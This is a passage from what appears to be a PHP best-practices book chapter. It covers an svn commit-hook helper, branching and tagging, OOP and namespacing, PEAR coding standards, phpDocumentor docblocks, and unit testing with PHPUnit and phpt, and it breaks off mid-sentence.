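function changedPhpFiles($svnlookOutput)
{
    $files = array();
    foreach (preg_split('/\R/', trim($svnlookOutput)) as $line) {
        // Each line is a one- or two-character status, then the path.
        if (!preg_match('/^([AUD_]{1,2})\s+(.+)$/', $line, $m)) {
            continue;
        }
        if ('D' != $m[1][0] && '.php' == substr($m[2], -4)) {
            $files[] = $m[2];
        }
    }
    return $files;
}

$sample = "U   trunk/lib/Book.php\nA   trunk/docs/README\nD   trunk/lib/Old.php\n";
print_r(changedPhpFiles($sample));
```

A complete hook would go on to inspect each file it finds, for example by running a syntax check or the relevant unit tests, and would exit with a non-zero status to reject the commit.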

As I mentioned, many revision control systems are available, in both proprietary
and open source forms. The most popular open source packages, and arguably the
most popular revision control systems, are Concurrent Versions System (CVS)
and Subversion (SVN). The popularity of the two is, in large part, due to their open
source nature; users obtain the tools for free, and can develop their own tools around
these without needing to worry about license infringement. Additionally, no
proprietary clients are necessary in order to work with these tools.

CVS is the grandfather of non-distributed systems, and is the chosen revision control
software for high-profile projects such as PHP itself and the PEAR project. Subversion
is an evolution of CVS, and offers easier syntax for renaming files and directories
in a repository, committing entire directory trees, and branching and tagging. This
software is used in many modern frameworks, such as eZ Components and the Zend
Framework.

I personally recommend the use of Subversion for any new PHP projects, as its ease
of setup, simple processes for creating pre- and post-commit hook scripts, and
integration with other tool sets (IDEs and bug-tracking software, for example), are
unparalleled among RCSs. Another advantage of Subversion is that the entire tree
is versioned; individual files don’t receive their own versions. This feature allows
you to make changes to multiple files as a distinct change set. When checking in
your code, you can check in a complete change (unit tests, code, and documentation)
all in one go. This style of versioning makes it easier later when you need to
look through the log files to determine what changed and when, and which files
were affected.


      How can I maintain multiple versions of a single codebase?
      Your project has just had a successful release, and now you need to support that
      release. However, you’ve been hard at work and already have new changes you
      want to introduce for the next release. How can you maintain both code bases, and
      ensure important fixes in one are ported to the other?

      Alternatively, perhaps you need to be able to continue development of your web
      site’s code base, but have a stable, production version of it running as well. How
      can you keep the two versions separate?

      Solution
      Branching and tagging are features common to RCS, allowing you to maintain
      separate branches of code in your repository. A branch is a separate version of the
      software that exists independently from other versions and maintains its own history.
      A tag is a named snapshot of the project at a given point in time.

      A typical repository layout should look something like this:

       project/
           branches/
           tags/
           trunk/



We create a branch for each release like so:

 project/
     branches/
         release-1.0.0/
         release-1.1.0/



The use of Subversion allows this task to be completed very easily:

 $ svn copy trunk branches/release-1.1.0 -m '1.1.0 release branch' 



Later, if you need to create a point release—a minor version, especially one intended
to fix bugs rather than add new features—you can create an appropriate tag:

 $ svn copy branches/release-1.0.0
 ➥ tags/release-1.0.1 -m '1.0.1 bugfix release'


Similarly, you can create a branch for a production version of a site:

 project/
     branches/
         production/
     tags/
     trunk/



When you’re ready to deploy a software release, create a tag with a name that
describes the changes:

 $ svn copy branches/production tags/2006-09-19-PirateDayJargon
 ➥ -m 'Pirate Day Jargon version of site for Pirate Day'



Discussion
In most cases, day-to-day development will occur in the repository trunk. When
you’re ready to create a software release, create a branch. From this point forward,
changes in the trunk will not affect code in the release branch—unless you merge
them manually. Branches provide code separation, which helps you to prevent new
features or backward compatibility breaks from creeping into released code. You
can also selectively merge bug fixes or new features from one branch to another
using your version control system’s merging capabilities. Here’s how the merge
command would be used in Subversion, for instance:


       $ svn merge
       ➥ -r 123:145 trunk/filename branches/release-1.0.0/filename



      However, an actual release needs to be static—that is, active development must
      have stopped—and we achieve this with tagging.

      In Subversion, tags and branches are created in the same way: via the “copy”
      operation. The only difference between them lies in the conventions that surround
      their use. Branches should indicate ongoing development, such as bug fixes, new
      features, and the like; tags should be considered static snapshots.

      One aspect to note is that Subversion copies are cheap. The repository does not
      duplicate the files; it records a link back to the existing tree (similar in
      concept to a Unix hard link), and new data is stored only when a change is
      checked in against the copy. This means you can, and should, branch and tag often.

      “Wait!” you say. “I’m not developing software; I’m developing a web site! How
      does this apply to me?” Easy now; you still need to be able to keep your development
      and production versions of the site separate, and your tags should represent points
      at which you launch bug fixes or new features on the site:

       project/
           branches/
               production/
           tags/
               2006-09-19-PirateDayJargon/
               2006-05-11-LifeUniverseEverything/
               2006-04-01-AprilFools/
           trunk/



      On a day-to-day basis, you work in the repository trunk. As you finish features or
      bug fixes, you merge them into the production branch. You then preview this branch
      on your staging server, which is almost identical to the production server—it may
      even use the same data, pulled from the same web services. Once you’ve verified
      the changes, or your quality assurance team has reviewed the site and given its seal
      of approval, you create a tag. You can then export the project files from this tag:


 $ svn export
 ➥ http://example.com/svn/project/tags/2006-09-19-PirateDayJargon
 ➥ 2006-09-19-PirateDayJargon


svn export grabs code from the repository and creates a local copy of the tree without
the versioning information (that is, the .svn subdirectories); unlike a checkout, the
result is not a working copy. This gives you a leaner, production-ready code tree to
deploy.


How can I write distributable code?
When you’re working in a team, or writing code that will be released to the public,
you need to keep several points in mind:

■	 Code should be easily reused and extended.
■	 Code should be easily readable.
■	 Code files should be easily found in the file system.

Common problems developers run into when they’re working on others’ code, or
they’re using or extending third-party code, include:

■	 difficulty extending code due to inflexible APIs (or lack of an API), or unclear
   inheritance (for example, how do you extend procedural code?)

■	 naming collisions as a result of poor naming practices such as using common
   names when creating a class (for example, Mail)

■	 difficulty reading other people’s code because of inconsistencies with indentation;
   variable, function, class, and file naming conventions; and code structure

These are obviously separate problems, but all are related to the problem of failing
to write distributable code.

Solutions
Distributable code is all about adopting good habits. There’s no single, bullet-proof
solution to writing distributable code, but there are a few programming practices
you should adopt. Turning them into programming habits will also mean that
writing distributable code will take no extra effort at all. Let’s take a look at three
different programming practices you should consider.

      Using OOP
      If you haven’t done so yet, make sure you read “What is OOP?” in Chapter 1. Object
      oriented programming (OOP) is often derided by performance experts as being very
      costly to an application’s performance.6 The counter-argument is that CPU cycles
      and memory are cheap, while developers are not. OOP provides incredible benefits
      to developers: object oriented code is very easily reused and extended, it’s typically
      easier to test because of the testing frameworks now available in PHP, it can reduce
      the number of naming collisions drastically, and it can lead to shorter syntax in
      many cases. Consider the following example:

                                                                                          oop.php (excerpt)

          class Foo
          {
            public function bar()
            {
              echo 'Do';
            }
          }

          class MyFoo extends Foo
          {
            public function bar()
            {
              parent::bar();
              echo ' more!';
            }
          }



      Class Foo has a bar method. Class MyFoo extends class Foo and overrides the bar
      method. This technique allows a MyFoo object to access the functionality of its parent
      class by calling parent::bar, and then add its own functionality to the bar method.
      The beauty of this approach is that the objects are now interchangeable—we can
      use either Foo or MyFoo, depending on the situation, and the method syntax remains
      exactly the same. We can instantiate an object of either class, pass it to other methods
      or functions, and use either object in exactly the same way without needing to know
      which class it encapsulates:



      6
          For documentation of PHP 5’s OOP feature set, visit http://www.php.net/oop5/.

 $foo = new Foo();
 $foo->bar();

 $foo = new MyFoo();
 $foo->bar();
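
To make the interchangeability concrete, here is a minimal sketch in which a single function accepts either object. The captureBar helper is hypothetical (it is not part of the original listing); Foo and MyFoo are repeated only so that the sketch runs on its own.

```php
<?php
class Foo
{
    public function bar()
    {
        echo 'Do';
    }
}

class MyFoo extends Foo
{
    public function bar()
    {
        parent::bar();
        echo ' more!';
    }
}

/**
 * Hypothetical helper: calls bar() on any Foo (or subclass of Foo)
 * and returns whatever the method printed.
 *
 * @param Foo $foo
 * @return string
 */
function captureBar(Foo $foo)
{
    ob_start();       // buffer the output instead of printing it
    $foo->bar();      // same call, whichever class we were given
    return ob_get_clean();
}

echo captureBar(new Foo()), "\n";   // Do
echo captureBar(new MyFoo()), "\n"; // Do more!
```

The caller never checks which class it received; the type hint only requires that the object is a Foo or one of its descendants.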



If we wanted to achieve the same end using procedural functions, the equivalent
code might look like this:

 function foo_bar()
 {
   echo 'Do';
 }

 function myfoo_bar()
 {
   foo_bar();
   echo ' more!';
 }

 myfoo_bar();



The actual function call is certainly faster now that we don’t have to instantiate an
object, although this benefit is moot with static methods. The downside is that we
can’t simply call foo_bar() and get the new behavior—we have to call an entirely
different function.

If we want to be able to dynamically call a method of our choosing elsewhere in
the application, we can’t hard-code the function call; instead, we need to pass a
function name or PHP callback. This approach could decrease performance, and
also makes debugging and testing more difficult.
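
As a rough illustration of the callback approach described above, the sketch below passes a function name to a caller that doesn't know which implementation it will run. The run_bar function is hypothetical, and the two functions return their strings rather than echoing them, purely to keep the example easy to check.

```php
<?php
function foo_bar()
{
    return 'Do';
}

function myfoo_bar()
{
    return foo_bar() . ' more!';
}

/**
 * Hypothetical caller: receives the function to run as a callback.
 *
 * @param string $callback Name of the function to call
 * @return string
 * @throws InvalidArgumentException if the callback cannot be called
 */
function run_bar($callback)
{
    // A typo in the function name only surfaces here, at run time
    if (!is_callable($callback)) {
        throw new InvalidArgumentException('Not a valid callback');
    }
    return call_user_func($callback);
}

echo run_bar('foo_bar'), "\n";   // Do
echo run_bar('myfoo_bar'), "\n"; // Do more!
```

Because the function is identified by a plain string, nothing ties 'myfoo_bar' to 'foo_bar' other than convention, which is part of what makes this style harder to debug and test.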

Let’s also consider that we may well need to implement similar functionality, but
with radically different internals. As an example, we might want to create two
different mail functions: one that sends email using the PHP mail function, and another
that sends it via SMTP. I’ve witnessed situations where both functions were named
mailer, which led to naming conflicts later when both files were loaded
simultaneously. If we incorporate these functions into classes instead, using, say,
My_Sendmail and My_Smtp as class names, we remove the conflict:

 class My_Sendmail
 {
   public function mailer($to, $subject, $body){}
 }

 class My_Smtp
 {
   public function mailer($to, $subject, $body, $host = 'localhost'){}
 }



      I mentioned earlier that classes are also easier to test than procedural code. This is
      because the popular and well-documented unit testing frameworks, SimpleTest and
      PHPUnit, were designed primarily to test class methods, and even define their test
      suites using classes:

                                                                          oop.php (excerpt)

       class FooTest extends PHPUnit_Framework_TestCase
       {
         /**
          * Foo Object
          * @var Foo
          */
         protected $_foo;
         /**
          * Setup environment
          */
         public function setUp()
         {
           $this->_foo = new Foo();
         }
         /**
          * Teardown environment
          */
         public function tearDown()
         {
           unset($this->_foo);
         }
         /**
          * Test the bar() method
          */
         public function testBar()
         {
           ⋮ test the method…
         }
       }




Writing object oriented code makes unit testing more intuitive and flexible—each
test method tests a method in a class. Should you wish to investigate further, you
can read about additional testing strategies on the SimpleTest and PHPUnit web
sites detailed in this chapter’s introduction.

Choosing a Namespace
We’ve mentioned naming conflicts once already. Just because you’re using OOP
now doesn’t mean you’re out of the woods; class names may still conflict. The easy
way to avoid the problem is to choose a namespace, a name prefix generally based
on the project name or vendor name, with which to prefix your classes.7 Here are
some examples of namespaces that are in use within existing projects:

■ Solar Framework: Solar_
■ Zend Framework: Zend_
■ Cerebral Cortex: Crtx_

Using a namespace has several benefits. Firstly, it provides a very easy way to
separate your code from that of other projects. If you make your code available through
a PEAR channel, for instance, having your own prefix means that your code will
be grouped under a single tree within your local PEAR checkout.

Secondly, as I’ve already mentioned, selecting a namespace helps to prevent naming
conflicts. Uri may be the shortest name that adequately describes your class, but it
could then conflict with another vendor’s Uri class; prefix it with your own
namespace, and the problem is avoided: Zend_Uri, Solar_Uri, My_Uri.
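
Here’s a minimal sketch of the idea. Both class names and their describe methods are hypothetical; the point is only that two “Uri” classes from different sources can be loaded side by side once each carries its own prefix.

```php
<?php
// Without prefixes, both classes would be named Uri, and loading the
// second definition would stop the script with a fatal error.
class My_Uri
{
    public function describe()
    {
        return 'URI handler from my project';
    }
}

class Other_Uri
{
    public function describe()
    {
        return 'URI handler from another vendor';
    }
}

$mine   = new My_Uri();
$theirs = new Other_Uri();

echo $mine->describe(), "\n";
echo $theirs->describe(), "\n";
```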

What should you use for your namespace? If you represent a company or a public
project, try to use its name; after all, this approach is good enough for Solar and
Zend. Also, try to keep the name short; you’ll appreciate not needing to type as
many keystrokes every time you create a new class definition. That said, a name
can be too short: you should probably use no fewer than three characters in order
to ensure that the name is unique and spells something recognizable. Crtx, for
instance, is recognizable as a truncation of “Cerebral Cortex”; anything shorter would
be unrecognizable, Cortex itself starts to get lengthy as a prefix, and CerebralCortex
is simply too long to be usable.

7
  For a good discussion of the value of namespaces, read Paul M. Jones’s blog entry “No More Loners!”
at http://paul-m-jones.com/blog/?p=215.

      Choosing a Coding Standard
      How many times have you reformatted a coworker’s (or former employee’s) code
      to make it more readable? How many times has someone done the same to your
      code? We can consider such actions to be a net loss of coding time.

      If this has happened too often in your shop, you’ve probably already decided
      to create a coding standard. Coding standards dictate:

      ■ file naming and placement
      ■ variable, function, and class naming conventions
      ■ indentation rules
      ■ documentation and comment guidelines

      … and much, much more.

      Rather than creating your own standard, consider adopting a public standard. The
      benefits of using a public standard include:

      It’s programmer-neutral.
           Instead of one programmer or group of programmers dictating their own
           preferences, choosing a public standard is a programmer-neutral solution.

      The issues have been settled.
         A public standard will have undergone heavy debate already. While not everyone
         will be able to agree that the outcome is the best one, everyone has agreed that
         the standards represent the best collective solutions.

      It can serve as a hiring criterion.
         When adopting a public standard, you can use it as a criterion of employment:
         “Applicant must know and be able to use XYZ Coding Standards.”

      It’s better for code distribution.
           For instance, if you’re following PEAR Coding Standards, your code will be in
           a format (both the physical, on-disk layout and the style in which the code
           is written) that can easily be packaged and installed using the PEAR
           installer, or via a PEAR channel.

So, what public standards exist? Some popular examples include:

■	 PEAR, at http://pear.php.net/manual/en/standards.php
■	 Zend Framework, at http://framework.zend.com/manual/en/coding-standard.html
■	 eZ Components, at http://svn.ez.no/svn/ezcomponents/docs/guidelines/

With some additions of their own, these coding standards were all originally derived
from the Horde project.8 Horde and PEAR coding standards are identical at this
point. Zend Framework standards basically follow those of PEAR, with a few slight
changes; all in all, however, Zend Framework remains compatible with PEAR. eZ
Components standards are basically only used by the eZ Components project and
those developers who code with it.

PEAR coding standards are widely adopted, and used in other high-profile projects
such as ADOdb9 and Solar.10 Overall, when it comes to choosing a standard to
adopt for your project or company, PEAR’s standards are probably the best option.

The basics of PEAR coding standards are summarized as follows:

■	 There is one class per file.

■	 Underscores in class names map to the directory separator: for example, Net_SMTP
   maps to Net/SMTP.php.

■	 There is One True Brace: class and function declarations have the opening brace
   on the following line at the same indentation level as the declaration; in other
   control structures, the opening brace remains on the same line as the statement.

■	 Code indentation should equal four spaces per indentation level.

■	 Variables, functions, and classes are named using camelCase or studlyCaps;
   variable and function names should begin lowercased, while classes should begin
   uppercased.


■	 Private and protected properties and methods should be named with a leading
   underscore.

■	 All classes, functions, and methods should have a docblock.

8
  http://horde.org/
9
  http://adodb.sourceforge.net/
10
   http://solarphp.com/

      All the examples in this chapter are written using PEAR coding standards.
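
The rule that maps underscores in class names to directory separators can be sketched in a few lines. The classNameToPath function is a hypothetical helper written for this illustration, not part of PEAR; it uses a forward slash, which PHP accepts as a path separator on all platforms.

```php
<?php
/**
 * Hypothetical helper: map a PEAR-style class name to the relative
 * path of the file that should contain it.
 *
 * @param string $className For example, Net_SMTP
 * @return string Relative file path
 */
function classNameToPath($className)
{
    // Each underscore in the class name becomes a directory separator
    return str_replace('_', '/', $className) . '.php';
}

echo classNameToPath('Net_SMTP'), "\n"; // Net/SMTP.php
```

Combined with the one-class-per-file rule, a mapping like this means that a class name alone is enough to locate its source file.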

      Discussion
      Writing distributable code is achievable once you adopt a few useful habits. Writing
      object oriented code may not give your projects a performance advantage, but it will
      help you develop code faster, as you’ll be able to easily reuse code that you or others
      have already written. Choosing a namespace for your code will help prevent colli­
      sions with code written by other developers, and provides for the easy grouping of
      different code bases in the directory tree. Finally, using a coding standard lets you
      ensure that you’ll be able to maintain the code of your fellow programmers, and
      vice versa.


      How can I document my code for later
      reference by myself or others?
      You’ve written the next great API, and you’re all ready to release it. But nobody,
      including your coworkers, knows how to use it. What methods are available? What
      arguments do they take? What do they return? What do they actually do? Why would
      anyone want to use them?

      The topic of documentation is often skimmed over during the coding phase, but as
      you can see from these questions, a lack of documentation can make your code
      basically worthless to others.

      “But I don’t have time to document!” you protest. “Documentation is too hard!”
      This is simply not true. Documentation can be created while you code, as part of
      your code. Let’s see how.


Solution
phpDocumentor uses specially formatted comment blocks, called docblocks, within
the code itself to generate documentation.11 The docblock format has existed for a
number of years, having originally been designed to support PHP 4 code, and is based
on Javadoc.12 A docblock starts with an opening /** and then follows the regular C-style
comment format; each subsequent line of a multiline docblock should start with a *.
Here’s an example:

                                                                 login.php (excerpt)

 /**
  * This is a sample docblock
  *
  * This is a sample docblock. Content prior to the first empty line
  * of the comment block is called the 'short description'; this
  * content here is considered the 'long description'.
  */



Docblocks can also contain tags that provide meta information, such as the function
or method parameters and return value types, the exceptions thrown, and more. As
an example, consider the following function declaration:

                                                                 login.php (excerpt)

 /**
   * Login a user
   *
   * Logs in a user, applying their credentials against those found in
   * the database.
   *
   * @param string $user Username
   * @param string $password User's password
   * @return boolean
   * @throws Exception on database error
   */
 function login($user, $password)
 {
    ⋮ function body…
 }



11
     http://phpdoc.org/
12
     http://java.sun.com/j2se/javadoc/

      Running this declaration through phpDocumentor is a fairly simple exercise:

       $ phpdoc -f login.php -t docs 



      This action creates a documentation tree inside the docs directory, and parses only
      the login.php file. The documentation generated for this function can be seen in
      Figure 13.1.




                     Figure 13.1. Documentation generated with phpDocumentor and docblocks


      You can link documented code using two different mechanisms. Any given docblock
      may contain one or more @see tags, each of which takes a single argument: a class,
      function, or method name, or a documented constant, variable, object property,
      or object constant. An optional second argument can be used to provide
      information about the link. Alternatively, you can generate inline links using the
      {@link argument comment} syntax; the argument is the same as the one we used
      for @see, and the comment we provide will become the text that will be linked (if
      none is provided, the argument is used). Here’s an example:

                                                                   login.php (excerpt)

 /**
   * Validate a password
   *
   * Validates a password for {@link login() the login function}.
   *
   * @see login() Login function
   * @param string $user Username
   * @param string $password User's password
   * @return boolean
   */
 function validatePassword($user, $password)
 {
    ⋮ function body…
 }



What can be documented with docblocks? Well, a file can have a page-level docblock
that describes the contents of the file, its author, copyright information, and so on.
Classes can have a docblock describing the class, inheritance, and more. Functions
and methods may have docblocks, as we saw previously. Additionally, any class
member variable can have a docblock. In short, any element of the code can have
a docblock.

Discussion
The main points to note about phpDocumentor-style code comments are:

■ Documentation resides with the code.
■ Documentation refers to the code it precedes.
■ Docblocks make your code self-documenting.

Knowing these points, you really have no reason not to document your code; so as
you code, document away to your heart’s content. As you’re doing so, keep a few
points in mind:

Use both short and long descriptions, unless they’re basically identical.
   In the example above, the long description provides additional information
   that’s not necessary for a short synopsis, but gives good information to the
   developer using it. Often, the parameters and return value provide plenty of
   information, so you don’t need to use the long description.

      Use the most specific parameter and return value types you can.
         For instance, don’t just use a type of object or stdClass if something more
         specific will work, such as Solar_Db_Adapter. A specific type will allow you to
         link to the appropriate class, producing even better documentation;
         additionally, some IDEs will use such type hints to provide better code completion.

      Another point to keep in mind is that phpDocumentor is not the only tool that can
      parse docblocks. Another tool that can utilize the same docblocks and docblock
      tags as phpDocumentor to create API documentation is Doxygen.13 The benefit to
      using Doxygen is that it supports languages other than PHP, such as C, C++, Java,
      and Python, and can generate documentation accordingly.

      Note also that docblocks are associated with compiler tokens in PHP itself, which
      means that they may be retrieved through PHP’s Reflection API using the
      getDocComment method of any of the various Reflection classes. This ability can
      be useful when you want to program some form of self-discovery into your
      code—when you’re creating server classes, for instance. Zend Framework makes
      use of this capability in its various server components (Zend_XmlRpc_Server,
      Zend_Rest_Server, Zend_Json_Server, and Zend_Soap_Wsdl) in order to have service
      classes generate their own server definitions.
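
As a small sketch of this kind of self-discovery, the code below reads a function’s docblock through the Reflection API and lists its documented parameters. The login function is a stand-in with a placeholder body, and the regular expression is a deliberately simple assumption; it is not how Zend Framework or phpDocumentor parse docblocks.

```php
<?php
/**
 * Log in a user
 *
 * @param string $user Username
 * @param string $password User's password
 * @return boolean
 */
function login($user, $password)
{
    return false; // placeholder body for this sketch
}

// Fetch the raw docblock text attached to the function
$reflection = new ReflectionFunction('login');
$docblock   = $reflection->getDocComment();

// Extract "@param type $name" pairs; a real parser would need to
// cope with many more tag formats than this pattern does
preg_match_all(
    '/@param\s+(\S+)\s+(\$\w+)/',
    $docblock,
    $matches,
    PREG_SET_ORDER
);

foreach ($matches as $match) {
    echo $match[2], ' is documented as ', $match[1], "\n";
}
```

Note that the docblock is only available if PHP has kept the comments, which is the default behavior.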

      Finally, many IDEs will use docblocks to provide code completion functionality.
      For example, as you type into Zend Studio and Eclipse, tool tips and drop-downs
      appear, displaying the possible methods of an object and the prototype for each
      method, as Figure 13.2 illustrates. It’s easy to select the entry you want to use from
      the list and save keystrokes in the process.




      13
           http://www.stack.nl/~dimitri/doxygen/





                Figure 13.2. IDE autocompletion based on PHP docblocks (Zend Studio)



      Comments Can Tell Lies!
     Programmers always have the best of intentions when they implement a
     systematic approach to using code comments. However, as time goes by and functions
     are patched, enhanced, or otherwise changed, the code comments will slowly
     become out of date unless they’re rigorously maintained. When you read someone
     else’s code comments, remember that they may have written those comments for
     the function as it was implemented three versions ago, which may not reflect how
     the function actually works today. When you approach your own code, try to be
     as accurate as possible with your commenting, but complement your docblocks
     with good unit test cases—we’ll look at unit testing in “How can I ensure future
     changes to my code won’t break current functionality?”. A good unit test suite
     can serve as functional documentation, too, as it documents how the code will
     behave when called.


So, start documenting your code today—you’ll never look back!


      How can I ensure future changes to my
      code won’t break current functionality?
      Your application has been in production for a month, and all is well, but your boss
      has requested a new feature. You create the new functionality, roll it out, and then,
      within minutes, you have an angry call from your boss, who complains that
      something’s broken on the site.

      How many times has this happened to you? How can you prevent it from ever
      happening again? Try out one of the unit testing frameworks available to PHP.

      Solutions
      The goal of unit testing is to isolate code into distinct units and verify that each of
      those units satisfies all your criteria.14 When they’re run after refactoring processes
      or the introduction of new features, unit tests are often referred to as regression
      tests, and are used to check that the changes have not broken existing functionality.

      Typical testing frameworks have you run code and make assertions against the return
      values or object state. The examples that follow all reference this code:

                                                                                         Foo.php (excerpt)

       /**
        * Foo class for PHP Anthology Best Practices chapter
        *
        * @package SitePoint
        * @version @release-version@
        * @copyright Copyright (C) 2006-Present, SitePoint Pty Ltd.
        * @author Matthew Weier O'Phinney <XXX@YYYY.ZZZ>
        */
       class Foo
       {
         /**
          * @var string
          */
         public $name;
         /**
          * @var boolean
          */
         public $baz = false;
         /**
          * Constructor
          *
          * @param string $name
          * @return void
          * @throws Exception with non-string or empty $name
          */
         public function __construct($name)
         {
           if (!is_string($name) || empty($name)) {
             throw new Exception('Invalid name');
           }
           $this->name = $name;
         }
         /**
          * Bar returns an array
          *
          * @return array
          */
         public function bar()
         {
           // 'bar' is the element the unit tests in this section look for
           return array(
               'bar',
               'bal',
               'boo'
           );
         }
         /**
          * Set the {@link $baz} flag
          *
          * @param boolean $flag
          * @return void
          */
         public function baz($flag)
         {
           $this->baz = ($flag) ? true : false;
         }
       }

      14
         Wikipedia has an entry on unit testing, along with references to many unit-testing resources, at
      http://en.wikipedia.org/wiki/Unit_testing.




Let’s look at an example of unit testing performed on the code above:


       $object = new Foo('sitepoint');
       $result = $object->bar();
       $this->assertTrue(is_array($result));
       $this->assertContains('bar', $result);



      In this test, we assert that the return value of the Foo object’s bar method is an array
      and contains the value bar as one element.

      Three principal testing frameworks are used by most PHP projects:

      phpt (http://qa.php.net/write-test.php)
         The testing format used by the PHP project itself, phpt is primarily found in
         unit tests written for PEAR modules.

      PHPUnit (http://phpunit.de/)
         Originally a PEAR project, but now a standalone project, PHPUnit is a faithful
         port of Java’s JUnit.15 PHPUnit is written in PHP 5, supports E_STRICT, and is
         targeted largely at OOP code.

      SimpleTest (http://www.lastcraft.com/simple_test.php)
         Written in the early days of PHPUnit to address the lack of Mock Objects and
         web testing functionality, SimpleTest supports PHP 4, and PHP 5 when it’s not
         set to report E_STRICT errors.

      Testing Using SimpleTest or PHPUnit
      SimpleTest and PHPUnit test cases are written as classes, and will typically test an
      entire class or file of functions at a time. The basic testing strategies of these
      frameworks are very similar, having only minor differences. I use PHPUnit in the
      examples to come, partly in order to build on it in upcoming sections; however, the
      code could be written in SimpleTest with very few changes.

      In this example, we’ll test the entire Foo class:

                                                                         unittest.php (excerpt)

       /**
        * Test class for class Foo
        *
        * @uses PHPUnit_Framework_TestCase
        * @package SitePoint
        * @subpackage UnitTests
        * @copyright Copyright (C) 2006-Present, SitePoint Pty Ltd.
        * @author Matthew Weier O'Phinney <XXX@YYYY.ZZZ>
        */
       class FooTest extends PHPUnit_Framework_TestCase
       {
         /**
          * @var Foo
          */
         protected $_foo;
         /**
          * Setup test environment
          *
          * @return void
          */
         public function setUp()
         {
           $this->_foo = new Foo('sitepoint');
         }
         /**
          * Tear down test environment
          *
          * @return void
          */
         public function tearDown()
         {
           unset($this->_foo);
         }
         /**
          * Verify that the constructor properly sets the name attribute
          *
          * @return void
          */
         public function testConstructorSetsName()
         {
           $this->assertEquals('sitepoint', $this->_foo->name);
           $foo = new Foo('anthology');
           $this->assertEquals('anthology', $foo->name);
         }
         /**
          * Verify that non-string or empty $name arguments cause the
          * constructor to throw an exception
          *
          * @return void
          */
         public function testConstructorThrowsExceptionOnBadName()
         {
           // fail() reports a failure by throwing an exception of its own, so
           // the check is made after the catch block rather than inside the try
           // block, where catch (Exception $e) would swallow it
           $badNames = array(
               'Empty string' => '',
               'Array'        => array('boo', 'bar'),
               'Object'       => new stdClass(),
               'Boolean'      => true
           );
           foreach ($badNames as $label => $badName) {
             $thrown = false;
             try {
               $foo = new Foo($badName);
             } catch (Exception $e) {
               $thrown = true;
             }
             $this->assertTrue($thrown, $label . ' should throw exception');
           }
         }
         /**
          * Verify Foo::bar() returns an array containing the value 'bar'
          *
          * @return void
          */
         public function testBar()
         {
           $bar = $this->_foo->bar();
           $this->assertTrue(is_array($bar));
           $this->assertContains('bar', $bar);
         }
         /**
          * Verify that baz() sets the $baz property
          *
          * @return void
          */
         public function testBazSetsBazProperty()
         {
           $this->_foo->baz(true);
           $this->assertTrue($this->_foo->baz);
           $this->_foo->baz(false);
           $this->assertFalse($this->_foo->baz);
           $this->_foo->baz(1);
           $this->assertTrue($this->_foo->baz);
           $this->_foo->baz(0);
           $this->assertFalse($this->_foo->baz);
         }
       }

      15
           http://www.junit.org/




In this example, the setUp method is called prior to each test case being run, and
creates a Foo object. The tearDown method is called after each test case, and, in this
instance, unsets the Foo object in the test suite.
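
To show the order of calls without needing a testing framework, here is a stripped-down sketch. LifecycleDemo and runTests are hypothetical names invented for this illustration; the runner is not PHPUnit’s implementation, and it reuses a single object, whereas PHPUnit builds a separate test case object for each test.

```php
<?php
/**
 * Hypothetical test case that records each call it receives.
 */
class LifecycleDemo
{
    public $log = array();

    public function setUp()
    {
        $this->log[] = 'setUp';
    }

    public function tearDown()
    {
        $this->log[] = 'tearDown';
    }

    public function testOne()
    {
        $this->log[] = 'testOne';
    }

    public function testTwo()
    {
        $this->log[] = 'testTwo';
    }
}

/**
 * Hypothetical runner: finds the methods whose names begin with
 * "test" and wraps each one in a setUp()/tearDown() pair.
 *
 * @param LifecycleDemo $case
 * @return array The recorded call order
 */
function runTests(LifecycleDemo $case)
{
    foreach (get_class_methods($case) as $method) {
        if (strpos($method, 'test') === 0) {
            $case->setUp();
            $case->$method();
            $case->tearDown();
        }
    }
    return $case->log;
}

echo implode(', ', runTests(new LifecycleDemo())), "\n";
// setUp, testOne, tearDown, setUp, testTwo, tearDown
```

Because every test gets a fresh setUp call, one test can’t accidentally depend on state left behind by another.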

Any method that begins with the word test is a test method. In the examples we’ve
covered, I’ve named each method to reflect either the class method being tested, or
the behavior I’m testing. Thus, the name testConstructorSetsName indicates that
this method will test that the constructor (__construct) sets the $name property in
the object correctly.

Behavioral testing such as this is particularly useful: as well as serving as
contracts for the objects, the test cases themselves can serve as agile
documentation, that is, documentation generated automatically from unit tests.
PHPUnit will generate agile documentation based on unit test names. For example,
the documentation generated for the method called testConstructorSetsName would
be “Constructor sets name.”
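
The name-to-sentence conversion is easy to picture with a few lines of code. The following is only a sketch of the idea, not PHPUnit’s own implementation; the function name testNameToSentence is hypothetical and exists purely for illustration:

```php
<?php
/**
 * Turn a test method name into a readable sentence.
 * Hypothetical helper for illustration; not part of PHPUnit.
 */
function testNameToSentence($method)
{
    // Drop the leading "test" prefix.
    $name = preg_replace('/^test/', '', $method);

    // Insert a space before each capital letter except the first character.
    $words = preg_replace('/(?<!^)([A-Z])/', ' $1', $name);

    // Lowercase everything, then capitalize the first word.
    return ucfirst(strtolower($words));
}

echo testNameToSentence('testConstructorSetsName'), "\n"; // Constructor sets name
echo testNameToSentence('testBazSetsBazProperty'), "\n";  // Baz sets baz property
```

The practical consequence is that descriptive method names pay off twice: once when a test fails, and again when the names are read as documentation.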

      Testing Using phpt
      I skipped over phpt testing in the solution above, so let’s take a quick look at it now.
      phpt tests typically target a single function or method at a time, with the goal of
      breaking the functionality that the unit provides. Test files are divided into several
      sections that define, at a minimum, the test name, the code to test, and the expected
      results. Tests are run either with run-tests.php, a script provided with the PHP
      distribution, or with the pear run-tests command.

      To test the Foo::bar method, we might write the following hypothetical test:

       --TEST--
       Foo::bar() method
       --FILE--
       <?php
       require_once 'Foo.class.php';
       $foo = new Foo('simpletest');
       $bar = $foo->bar();
       assert(is_array($bar));
       assert(in_array('bar', $bar));
       ?>
       --EXPECT--



      You’ll note that the --EXPECT-- section here is empty. The idea is that no output
      is expected; the test will fail if any output—such as a warning from the assert
      statements—is generated.

      This next example sets up a testing scaffold that includes the source PHP file for
      the class to test, and creates the object to test. There are no formal procedures for
      creating test scaffolds with phpt tests, but one common convention is to create a
      setup.php.inc file, like so:

                                                                                setup.php.inc

       <?php
       require_once 'Foo.class.php';
       $foo = new Foo('simpletest');
       ?>



      That file performs the setup for us; we then require it in our test script:

                                                                    phpt.php (excerpt)

 --TEST--
 Foo::bar() method
 --FILE--
 <?php
 require_once 'setup.php.inc';
 $bar = $foo->bar();
 assert(is_array($bar));
 assert(in_array('bar', $bar));
 ?>
 --EXPECT--



phpt tests are generally very easy to write, and offer the advantage that each test is
run in its own environment so, for instance, you don’t have to worry about resetting
static variable values between tests. The big disadvantages of phpt tests are the
